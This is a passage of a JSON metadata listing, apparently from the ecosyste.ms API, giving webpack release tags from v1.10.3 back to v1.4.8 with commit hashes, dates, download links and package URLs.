ull,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/